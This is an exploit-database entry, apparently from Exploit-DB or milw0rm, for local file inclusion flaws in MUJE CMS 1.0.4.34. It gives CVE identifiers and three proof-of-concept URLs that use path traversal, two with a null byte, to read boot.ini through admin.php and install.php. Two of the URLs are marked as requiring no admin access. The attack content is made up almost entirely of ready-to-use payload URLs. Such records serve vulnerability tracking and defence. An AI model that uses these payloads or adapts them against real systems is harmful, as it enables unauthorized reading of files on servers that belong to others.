EXPLOITS

MUJE CMS 1.0.4.34 - Local File Inclusion

Author: SirGod
type: webapps
platform: php
port: 
date_added: 2009-07-29  
date_updated:   
verified: 1  
codes: OSVDB-58484;CVE-2009-3508;OSVDB-58483;OSVDB-56637  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9314.txt  

####################################################################################
[+] MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
####################################################################################

[+] Download : http://sourceforge.net/projects/mujecms/

[+] Local File Inclusion

 - No admin required

 - PoC's

    http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00

    http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini


 - Admin required

    http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00

####################################################################################

# milw0rm.com [2009-07-30]